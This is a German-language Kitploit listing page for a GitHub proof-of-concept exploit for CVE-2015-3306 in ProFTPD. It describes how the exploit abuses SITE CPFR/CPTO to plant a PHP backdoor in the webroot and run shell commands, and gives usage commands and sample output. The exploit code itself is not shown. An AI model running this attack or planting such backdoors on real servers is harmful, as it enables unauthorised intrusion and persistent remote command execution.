Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2015-3306 | Kitploit
Tools/GitHubGitHub/donmedfor/cve-2015-3306
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Repository anzeigen
vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2015-3306 ProFTPD Exploit

Dieses Repository enthält einen Python-Proof-of-Concept (PoC)-Exploit für CVE-2015-3306

⚠️ Warnung: Verwenden Sie dies nur gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben. Unbefugte Ausnutzung ist illegal.


Autor

Mohamed EL-KHAROUATI


Teil 1: CVE-2015-3306 ProFTPD Exploit

Beschreibung

CVE-2015-3306 ist eine Directory-Traversal-Schwachstelle in ProFTPD 1.3.5b und früheren Versionen. Dieser Exploit ermöglicht das Kopieren beliebiger Dateien und das Platzieren einer PHP-Hintertür im Webroot. Die Hintertür kann beliebige Shell-Befehle ausführen.

Funktionen

  • Nutzt die Directory-Traversal-Schwachstelle über die FTP-Befehle SITE CPFR/CPTO aus.
  • Platziert eine PHP-Hintertür (backdoor.php) im angegebenen Webroot.
  • Führt beliebige Shell-Befehle über die Hintertür aus.
  • Unterstützt benutzerdefinierte Befehle über --rcommand.

Anforderungen

  • Python 3.x
  • requests-Bibliothek (pip install requests)

Verwendung, Ausgabe und Bereinigung (Ein einzelner Codeblock)

root@kitploit:~
# Exploit ausführen
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>

# Beispiel:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami

# Erwartete Ausgabe:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done
Tool herunterladen